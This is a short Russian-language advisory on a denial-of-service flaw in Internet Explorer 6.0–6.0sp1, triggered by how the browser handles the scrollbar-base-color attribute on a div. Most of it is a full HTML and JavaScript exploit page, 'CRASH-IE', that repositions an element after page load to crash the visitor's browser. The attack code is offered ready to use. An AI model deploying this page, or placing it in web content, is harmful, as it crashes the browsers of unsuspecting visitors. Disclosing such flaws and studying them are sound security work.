Программа: Microsoft Internet Explorer 6.0 – 6.0sp1
Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный атакующий может вызвать отказ в обслуживании.
Проблема связанна с некорректной обработкой scrollbar-base-color атрибута div объекта. В результате удаленный атакующий может создать Web страницу, содержащую произвольный код сценария, чтобы аварийно завершить работу браузера пользователя, пытающего просмотреть эту Web страницу.
Эксплоит:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CRASH-IE</title>
<style type="text/css">
html, body {
overflow-y: hidden;
scrollbar-base-color: '#330066';
}
.crash {
position:absolute;
left:200px;
top:200px;
width:200px;
}
</style>
<script type="text/javascript">
function galgenfrist() {
window.setTimeout('crashIE();',1000);
}
function crashIE() {
var moveNode = document.getElementById("move");
if(moveNode) {
moveNode.style.top = "100px";
moveNode.style.left = "200px";
}
}
</script>
</head>
<body onload="galgenfrist();">
<h1>CRASH-IE</h1>
<div id="move" class="crash">
<table>
<tbody>
<tr>
<td>
<textarea></textarea>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>
